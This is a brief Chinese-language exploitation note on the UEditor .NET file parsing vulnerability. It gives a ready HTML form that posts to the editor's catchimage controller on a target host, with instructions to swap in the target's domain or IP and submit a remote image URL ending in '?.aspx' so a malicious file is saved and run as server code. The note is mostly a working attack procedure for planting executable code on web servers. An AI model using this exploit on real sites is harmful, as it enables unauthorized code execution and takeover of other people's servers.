【笔记】UEditor文件解析漏洞
前言
UEditor文件解析漏洞
漏洞利用
- 构造一个HTML,并用浏览器打开
127.0.0.1:80:改为目标站点域名或ip地址
1 | <form action="http://127.0.0.1:80/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="post"> |
- 在文本框中填写一个包含恶意代码的图片公网地址,后缀添加
?.aspx,上传成功后访问这个文件即可被当作asp代码执行